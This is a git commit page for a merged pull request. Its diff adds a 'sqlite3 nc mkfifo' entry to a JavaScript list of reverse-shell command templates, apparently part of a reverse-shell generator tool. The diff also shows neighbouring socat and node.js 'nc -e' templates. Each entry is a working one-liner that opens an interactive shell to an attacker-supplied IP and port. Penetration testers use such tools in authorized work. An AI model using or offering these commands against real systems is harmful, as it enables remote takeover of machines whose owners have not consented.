Merge pull request #134 from 0Magenta0/main

This commit is contained in:
Ryan Montgomery 2023-05-04 12:27:34 -04:00 committed by GitHub
commit 3b38721bba
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -275,6 +275,11 @@ const reverseShellCommands = withCommandType(
"command": "socat TCP:{ip}:{port} EXEC:'{shell}',pty,stderr,setsid,sigint,sane",
"meta": ["linux", "mac"]
},
{
"name": "sqlite3 nc mkfifo",
"command": "sqlite3 /dev/null '.shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f'",
"meta": ["linux", "mac"]
},
{
"name": "node.js",
"command": "require('child_process').exec('nc -e {shell} {ip} {port}')",